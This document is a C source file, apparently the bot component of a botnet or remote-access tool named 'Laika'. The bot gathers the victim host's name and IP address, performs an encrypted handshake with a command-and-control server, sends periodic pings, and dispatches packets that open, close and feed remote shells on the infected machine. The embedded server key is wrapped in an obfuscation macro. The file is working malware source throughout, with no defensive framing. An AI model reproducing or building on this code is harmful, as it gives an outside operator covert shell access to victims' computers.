#include "bot.h" #include "lbox.h" #include "lerror.h" #include "lmem.h" #include "lsodium.h" #include "shell.h" void laikaB_handleHandshakeResponse(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, void *uData) { struct sLaika_bot *bot = (struct sLaika_bot *)uData; uint8_t endianness = laikaS_readByte(&peer->sock); peer->sock.flipEndian = endianness != laikaS_isBigEndian(); LAIKA_DEBUG("handshake accepted by cnc! got endian flag : %s\n", (endianness ? "TRUE" : "FALSE")); } void laikaB_handlePing(struct sLaika_peer *peer, LAIKAPKT_SIZE sz, void *uData) { LAIKA_DEBUG("got ping from cnc!\n"); /* stubbed */ } /* ====================================[[ Packet Tables ]]===================================== */ /* clang-format off */ struct sLaika_peerPacketInfo laikaB_pktTbl[LAIKAPKT_MAXNONE] = { LAIKA_CREATE_PACKET_INFO(LAIKAPKT_HANDSHAKE_RES, laikaB_handleHandshakeResponse, sizeof(uint8_t), false), LAIKA_CREATE_PACKET_INFO(LAIKAPKT_PINGPONG, laikaB_handlePing, 0, false), LAIKA_CREATE_PACKET_INFO(LAIKAPKT_SHELL_OPEN, laikaB_handleShellOpen, sizeof(uint32_t) + sizeof(uint16_t) + sizeof(uint16_t), false), LAIKA_CREATE_PACKET_INFO(LAIKAPKT_SHELL_CLOSE, laikaB_handleShellClose, sizeof(uint32_t), false), LAIKA_CREATE_PACKET_INFO(LAIKAPKT_SHELL_DATA, laikaB_handleShellData, 0, true), }; /* clang-format on */ /* socket event */ void laikaB_onPollFail(struct sLaika_socket *sock, void *uData) { struct sLaika_peer *peer = (struct sLaika_peer *)sock; struct sLaika_bot *bot = (struct sLaika_bot *)uData; laikaS_kill(&bot->peer->sock); } /* ==========================================[[ Bot ]]========================================== */ struct sLaika_bot *laikaB_newBot(void) { LAIKA_BOX_SKID_START(char *, cncPubKey, LAIKA_PUBKEY); struct sLaika_bot *bot = laikaM_malloc(sizeof(struct sLaika_bot)); struct hostent *host; char *tempINBuf; size_t _unused; int i; laikaP_initPList(&bot->pList); bot->peer = laikaS_newPeer(laikaB_pktTbl, &bot->pList, laikaB_onPollFail, (void *)bot, (void *)bot); laikaT_initTaskService(&bot->tService); laikaT_newTask(&bot->tService, 5000, laikaB_pingTask, (void *)bot); /* init shells */ for (i = 0; i < LAIKA_MAX_SHELLS; i++) { bot->shells[i] = NULL; } bot->shellTask = NULL; bot->activeShells = 0; /* generate keypair */ if (sodium_init() < 0) { laikaB_freeBot(bot); LAIKA_ERROR("LibSodium failed to initialize!\n"); } if (!laikaK_genKeys(bot->pub, bot->priv)) { laikaB_freeBot(bot); LAIKA_ERROR("Failed to gen keypair!\n"); } /* read cnc's public key into peerPub */ if (!laikaK_loadKeys(bot->peer->peerPub, NULL, cncPubKey, NULL)) { laikaB_freeBot(bot); LAIKA_ERROR("Failed to init cnc public key!\n"); } /* grab hostname & ip info */ if (SOCKETERROR(gethostname(bot->peer->hostname, LAIKA_HOSTNAME_LEN))) { laikaB_freeBot(bot); LAIKA_ERROR("gethostname() failed!\n"); } if ((host = gethostbyname(bot->peer->hostname)) == NULL) { laikaB_freeBot(bot); LAIKA_ERROR("gethostbyname() failed!\n"); } if ((tempINBuf = inet_ntoa(*((struct in_addr *)host->h_addr_list[0]))) == NULL) { laikaB_freeBot(bot); LAIKA_ERROR("inet_ntoa() failed!\n"); } /* copy inet address info */ strcpy(bot->peer->inet, tempINBuf); LAIKA_BOX_SKID_END(cncPubKey); return bot; } void laikaB_freeBot(struct sLaika_bot *bot) { int i; /* clear shells */ for (i = 0; i < LAIKA_MAX_SHELLS; i++) { if (bot->shells[i]) laikaB_freeShell(bot, bot->shells[i]); } laikaP_cleanPList(&bot->pList); laikaS_freePeer(bot->peer); laikaT_cleanTaskService(&bot->tService); laikaM_free(bot); } void laikaB_connectToCNC(struct sLaika_bot *bot, char *ip, char *port) { struct sLaika_socket *sock = &bot->peer->sock; /* setup socket */ laikaS_connect(sock, ip, port); laikaS_setNonBlock(sock); laikaP_addSock(&bot->pList, sock); /* queue handshake request */ laikaS_startOutPacket(bot->peer, LAIKAPKT_HANDSHAKE_REQ); laikaS_write(sock, LAIKA_MAGIC, LAIKA_MAGICLEN); laikaS_writeByte(sock, LAIKA_VERSION_MAJOR); laikaS_writeByte(sock, LAIKA_VERSION_MINOR); laikaS_writeByte(sock, LAIKA_OSTYPE); /* write public key */ laikaS_write(sock, bot->pub, sizeof(bot->pub)); laikaS_write(sock, bot->peer->hostname, LAIKA_HOSTNAME_LEN); laikaS_write(sock, bot->peer->inet, LAIKA_INET_LEN); laikaS_endOutPacket(bot->peer); /* after the cnc receives our handshake, our packets will be encrypted */ laikaS_setSecure(bot->peer, true); if (crypto_kx_client_session_keys(bot->peer->inKey, bot->peer->outKey, bot->pub, bot->priv, bot->peer->peerPub) != 0) LAIKA_ERROR("failed to gen session key!\n"); } bool laikaB_poll(struct sLaika_bot *bot) { struct sLaika_pollEvent *evnt; int numEvents; /* flush any events prior (eg. made by a task) */ laikaP_flushOutQueue(&bot->pList); evnt = laikaP_poll(&bot->pList, laikaT_timeTillTask(&bot->tService), &numEvents); /* no events? timeout was reached */ if (numEvents == 0) { laikaT_pollTasks(&bot->tService); return false; } laikaP_handleEvent(evnt); /* flush any events after (eg. made by a packet handler) */ laikaP_flushOutQueue(&bot->pList); return true; } void laikaB_pingTask(struct sLaika_taskService *service, struct sLaika_task *task, clock_t currTick, void *uData) { struct sLaika_bot *bot = (struct sLaika_bot *)uData; laikaS_emptyOutPacket(bot->peer, LAIKAPKT_PINGPONG); }